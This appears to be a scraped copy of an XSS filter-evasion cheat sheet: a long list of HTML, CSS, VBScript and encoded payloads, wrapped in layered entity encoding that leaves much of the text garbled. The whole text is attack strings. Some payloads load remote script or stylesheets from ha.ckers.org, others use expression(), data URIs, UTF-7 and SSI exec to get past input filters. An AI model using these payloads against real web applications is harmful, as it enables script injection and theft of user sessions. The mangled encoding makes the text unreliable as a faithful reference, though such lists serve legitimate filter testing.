&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
